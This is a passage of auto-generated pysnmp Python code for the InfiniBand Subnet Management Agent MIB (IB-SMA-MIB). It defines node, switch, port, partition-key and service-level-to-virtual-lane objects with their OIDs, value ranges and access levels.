ibSmaNodeGid1 = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 24), OctetString().subtype(subtypeSpec=ValueSizeConstraint(16, 16)).setFixedLength(16)).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeGid1.setStatus('current')
ibSmaNodeGid2 = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 25), OctetString().subtype(subtypeSpec=ValueSizeConstraint(16, 16)).setFixedLength(16)).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeGid2.setStatus('current')
ibSmaNodeCapMask = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 26), OctetString().subtype(subtypeSpec=ValueSizeConstraint(4, 4)).setFixedLength(4)).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeCapMask.setStatus('current')
ibSmaNodeSwitchLid = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 27), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeSwitchLid.setStatus('current')
ibSmaNodeDataValid = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 28), Bits().clone(namedValues=NamedValues(("lidaddr1", 0), ("lidaddr2", 1), ("pkey", 2), ("sl", 3), ("qp1", 4), ("qp2", 5), ("gidaddr1", 6), ("gidaddr2", 7)))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeDataValid.setStatus('current')
ibSmaSwitchInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 2))
ibSmaSwLinearFdbTableNum = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 49151))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwLinearFdbTableNum.setStatus('current')
ibSmaSwRandomFdbTableNum = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 2), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 49151))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwRandomFdbTableNum.setStatus('current')
ibSmaSwMulticastFdbTableNum = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 16383))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwMulticastFdbTableNum.setStatus('current')
ibSmaSwLinearFdbTop = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 4), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 49151))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwLinearFdbTop.setStatus('current')
ibSmaSwDefaultPort = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 5), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 254))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwDefaultPort.setStatus('current')
ibSmaSwDefMcastPriPort = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 6), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 254))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwDefMcastPriPort.setStatus('current')
ibSmaSwDefMcastNotPriPort = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 7), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 254))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwDefMcastNotPriPort.setStatus('current')
ibSmaSwLifeTimeValue = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 8), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 20))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwLifeTimeValue.setStatus('current')
ibSmaSwPortStateChange = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 9), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwPortStateChange.setStatus('current')
ibSmaSwLidsPerPort = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 10), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwLidsPerPort.setStatus('current')
ibSmaSwPartitionEnforceNum = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 11), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwPartitionEnforceNum.setStatus('current')
ibSmaSwInboundEnforceCap = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 12), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwInboundEnforceCap.setStatus('current')
ibSmaSwOutboundEnforceCap = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 13), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwOutboundEnforceCap.setStatus('current')
ibSmaSwFilterRawPktInputCap = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 14), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwFilterRawPktInputCap.setStatus('current')
ibSmaSwFilterRawPktOutputCap = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 15), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwFilterRawPktOutputCap.setStatus('current')
ibSmaSwEnhancedPort0 = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 16), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwEnhancedPort0.setStatus('current')
ibSmaGuidInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 3))
ibSmaGuidInfoTable = MibTable((1, 3, 6, 1, 3, 117, 3, 1, 3, 1), )
if mibBuilder.loadTexts: ibSmaGuidInfoTable.setStatus('current')
ibSmaGuidInfoEntry = MibTableRow((1, 3, 6, 1, 3, 117, 3, 1, 3, 1, 1), ).setIndexNames((0, "IB-SMA-MIB", "ibSmaGuidPortIndex"), (0, "IB-SMA-MIB", "ibSmaGuidIndex"))
if mibBuilder.loadTexts: ibSmaGuidInfoEntry.setStatus('current')
ibSmaGuidPortIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 3, 1, 1, 1), IbDataPort())
if mibBuilder.loadTexts: ibSmaGuidPortIndex.setStatus('current')
ibSmaGuidIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 3, 1, 1, 2), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 255)))
if mibBuilder.loadTexts: ibSmaGuidIndex.setStatus('current')
ibSmaGuidVal = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 3, 1, 1, 3), IbGuid()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaGuidVal.setStatus('current')
ibSmaMgmtPortInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 4))
ibSmaPortMKey = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(8, 8)).setFixedLength(8)).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortMKey.setStatus('current')
ibSmaPortGidPrefix = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(8, 8)).setFixedLength(8)).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortGidPrefix.setStatus('current')
ibSmaPortLid = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 49151))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortLid.setStatus('current')
ibSmaPortMasterSmLid = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 4), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 49151))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortMasterSmLid.setStatus('current')
ibSmaPortIsSubnetManager = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 5), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsSubnetManager.setStatus('current')
ibSmaPortIsNoticeSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 6), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsNoticeSupported.setStatus('current')
ibSmaPortIsTrapSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 7), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsTrapSupported.setStatus('current')
ibSmaPortIsAutoMigrateSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 8), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsAutoMigrateSupported.setStatus('current')
ibSmaPortIsSlMappingSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 9), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsSlMappingSupported.setStatus('current')
ibSmaPortIsMKeyNvram = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 10), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsMKeyNvram.setStatus('current')
ibSmaPortIsPKeyNvram = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 11), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsPKeyNvram.setStatus('current')
ibSmaPortIsLedInfoSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 12), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsLedInfoSupported.setStatus('current')
ibSmaPortIsSmDisabled = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 13), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsSmDisabled.setStatus('current')
ibSmaPortIsSysImgGuidSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 14), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsSysImgGuidSupported.setStatus('current')
ibSmaPortIsPKeyExtPortTrapSup = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 15), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsPKeyExtPortTrapSup.setStatus('current')
ibSmaPortIsCommManageSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 16), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsCommManageSupported.setStatus('current')
ibSmaPortIsSnmpTunnelSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 17), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsSnmpTunnelSupported.setStatus('current')
ibSmaPortIsReinitSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 18), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsReinitSupported.setStatus('current')
ibSmaPortIsDevManageSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 19), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsDevManageSupported.setStatus('current')
ibSmaPortIsVendorClassSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 20), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsVendorClassSupported.setStatus('current')
ibSmaPortIsDrNoticeSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 21), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsDrNoticeSupported.setStatus('current')
ibSmaPortIsCapMaskNoticSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 22), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsCapMaskNoticSupported.setStatus('current')
ibSmaPortIsBootMgmtSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 23), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsBootMgmtSupported.setStatus('current')
ibSmaPortMKeyLeasePeriod = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 24), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setUnits('seconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortMKeyLeasePeriod.setStatus('current')
ibSmaPortMKeyProtectBits = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 25), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("noMKeyProtection", 1), ("succeedWithReturnKey", 2), ("succeedWithReturnZeroes", 3), ("failOnNoMatch", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortMKeyProtectBits.setStatus('current')
ibSmaPortMasterSmSl = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 26), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 15))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortMasterSmSl.setStatus('current')
ibSmaPortInitTypeLoad = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 27), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortInitTypeLoad.setStatus('current')
ibSmaPortInitTypeContent = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 28), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortInitTypeContent.setStatus('current')
ibSmaPortInitTypePresence = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 29), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortInitTypePresence.setStatus('current')
ibSmaPortInitTypeResuscitate = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 30), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortInitTypeResuscitate.setStatus('current')
ibSmaPortInitNoLoadReply = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 31), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortInitNoLoadReply.setStatus('current')
ibSmaPortInitPreserveContReply = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 32), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortInitPreserveContReply.setStatus('current')
ibSmaPortInitPreservePresReply = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 33), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortInitPreservePresReply.setStatus('current')
ibSmaPortMKeyViolations = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 34), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortMKeyViolations.setStatus('current')
ibSmaPortPKeyViolations = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 35), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortPKeyViolations.setStatus('current')
ibSmaPortQKeyViolations = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 36), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortQKeyViolations.setStatus('current')
ibSmaPortNumGuid = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 37), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortNumGuid.setStatus('current')
ibSmaPortSubnetTimeout = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 38), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 31))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortSubnetTimeout.setStatus('current')
ibSmaPortResponseTimeValue = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 39), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 31))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortResponseTimeValue.setStatus('current')
ibSmaDataPortInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 5))
ibSmaPortInfoTable = MibTable((1, 3, 6, 1, 3, 117, 3, 1, 5, 1), )
if mibBuilder.loadTexts: ibSmaPortInfoTable.setStatus('current')
ibSmaPortInfoEntry = MibTableRow((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1), ).setIndexNames((0, "IB-SMA-MIB", "ibSmaPortIndex"))
if mibBuilder.loadTexts: ibSmaPortInfoEntry.setStatus('current')
ibSmaPortIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 1), IbDataPort())
if mibBuilder.loadTexts: ibSmaPortIndex.setStatus('current')
ibSmaPortLinkWidthEnabled = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9))).clone(namedValues=NamedValues(("oneX", 1), ("fourX", 2), ("oneXOr4X", 3), ("twelveX", 4), ("oneXOr12X", 5), ("fourXOr12X", 6), ("oneX4XOr12X", 7), ("linkWidthSupported", 8), ("other", 9)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortLinkWidthEnabled.setStatus('current')
ibSmaPortLinkWidthSupported = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("oneX", 1), ("oneXOr4X", 2), ("oneX4XOr12X", 3), ("other", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortLinkWidthSupported.setStatus('current')
ibSmaPortLinkWidthActive = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("oneX", 1), ("fourX", 2), ("twelveX", 3), ("other", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortLinkWidthActive.setStatus('current')
ibSmaPortLinkSpeedSupported = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("twoPoint5Gbps", 1), ("other", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortLinkSpeedSupported.setStatus('current')
ibSmaPortLinkState = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("down", 1), ("init", 2), ("armed", 3), ("active", 4), ("other", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortLinkState.setStatus('current')
ibSmaPortPhysState = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7))).clone(namedValues=NamedValues(("sleep", 1), ("polling", 2), ("disabled", 3), ("portConfigTraining", 4), ("linkUp", 5), ("linkErrorRecovery", 6), ("other", 7)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortPhysState.setStatus('current')
ibSmaPortLinkDownDefaultState = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("sleep", 1), ("polling", 2), ("other", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortLinkDownDefaultState.setStatus('current')
ibSmaPortLidMaskCount = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 9), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 7))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortLidMaskCount.setStatus('current')
ibSmaPortLinkSpeedActive = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("twoPoint5Gbps", 1), ("other", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortLinkSpeedActive.setStatus('current')
ibSmaPortLinkSpeedEnabled = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("twoPoint5Gbps", 1), ("linkSpeedSupported", 2), ("other", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortLinkSpeedEnabled.setStatus('current')
ibSmaPortNeighborMtu = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 12), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("mtu256", 1), ("mtu512", 2), ("mtu1024", 3), ("mtu2048", 4), ("mtu4096", 5), ("other", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortNeighborMtu.setStatus('current')
ibSmaPortVirtLaneSupport = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 13), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("vl0", 1), ("vl0ToVl1", 2), ("vl0ToVl3", 3), ("vl0ToVl7", 4), ("vl0ToVl14", 5), ("other", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortVirtLaneSupport.setStatus('current')
ibSmaPortVlHighPriorityLimit = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 14), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortVlHighPriorityLimit.setStatus('current')
ibSmaPortVlArbHighCapacity = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 15), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 64))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortVlArbHighCapacity.setStatus('current')
ibSmaPortVlArbLowCapacity = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 16), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 64))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortVlArbLowCapacity.setStatus('current')
ibSmaPortMtuCapacity = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 17), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("mtu256", 1), ("mtu512", 2), ("mtu1024", 3), ("mtu2048", 4), ("mtu4096", 5), ("other", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortMtuCapacity.setStatus('current')
ibSmaPortVlStallCount = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 18), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 7))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortVlStallCount.setStatus('current')
ibSmaPortHeadOfQueueLife = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 19), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 20))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortHeadOfQueueLife.setStatus('current')
ibSmaPortOperationalVls = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 20), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("vl0", 1), ("vl0ToVl1", 2), ("vl0ToVl3", 3), ("vl0ToVl7", 4), ("vl0ToVl14", 5), ("other", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortOperationalVls.setStatus('current')
ibSmaPortPartEnforceInbound = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 21), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortPartEnforceInbound.setStatus('current')
ibSmaPortPartEnforceOutbound = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 22), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortPartEnforceOutbound.setStatus('current')
ibSmaPortFilterRawPktInbound = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 23), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortFilterRawPktInbound.setStatus('current')
ibSmaPortFilterRawPktOutbound = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 24), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortFilterRawPktOutbound.setStatus('current')
ibSmaPortLocalPhysErrorThreshold = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 25), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 15))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortLocalPhysErrorThreshold.setStatus('current')
ibSmaPortOverrunErrorThreshold = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 26), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 15))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortOverrunErrorThreshold.setStatus('current')
ibSmaPKeyInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 6))
ibSmaPKeyTable = MibTable((1, 3, 6, 1, 3, 117, 3, 1, 6, 1), )
if mibBuilder.loadTexts: ibSmaPKeyTable.setStatus('current')
ibSmaPKeyEntry = MibTableRow((1, 3, 6, 1, 3, 117, 3, 1, 6, 1, 1), ).setIndexNames((0, "IB-SMA-MIB", "ibSmaPKeyIBAPortIndex"), (0, "IB-SMA-MIB", "ibSmaPKeyIndex"))
if mibBuilder.loadTexts: ibSmaPKeyEntry.setStatus('current')
ibSmaPKeyIBAPortIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 6, 1, 1, 1), IbDataPortAndInvalid())
if mibBuilder.loadTexts: ibSmaPKeyIBAPortIndex.setStatus('current')
ibSmaPKeyIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 6, 1, 1, 2), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 65504)))
if mibBuilder.loadTexts: ibSmaPKeyIndex.setStatus('current')
ibSmaPKeyMembership = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 6, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("none", 1), ("limited", 2), ("full", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPKeyMembership.setStatus('current')
ibSmaPKeyBase = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 6, 1, 1, 4), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 65527))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPKeyBase.setStatus('current')
ibSmaSlToVlMapInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 7))
ibSmaSL2VLMapTable = MibTable((1, 3, 6, 1, 3, 117, 3, 1, 7, 1), )
if mibBuilder.loadTexts: ibSmaSL2VLMapTable.setStatus('current')
ibSmaSL2VLMapEntry = MibTableRow((1, 3, 6, 1, 3, 117, 3, 1, 7, 1, 1), ).setIndexNames((0, "IB-SMA-MIB", "ibSmaIBAOutPortIndex"), (0, "IB-SMA-MIB", "ibSmaIBAInPortIndex"), (0, "IB-SMA-MIB", "ibSmaServiceLevelIndex"))
if mibBuilder.loadTexts: ibSmaSL2VLMapEntry.setStatus('current')
ibSmaIBAOutPortIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 7, 1, 1, 1), IbDataPortAndInvalid())
if mibBuilder.loadTexts: ibSmaIBAOutPortIndex.setStatus('current')
ibSmaIBAInPortIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 7, 1, 1, 2), IbDataPortAndInvalid())
if mibBuilder.loadTexts: ibSmaIBAInPortIndex.setStatus('current')
ibSmaServiceLevelIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 7, 1, 1, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 15)))
if mibBuilder.loadTexts: ibSmaServiceLevelIndex.setStatus('current')
ibSmaVirtualLane = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 7, 1, 1, 4), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 15))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaVirtualLane.setStatus('current')
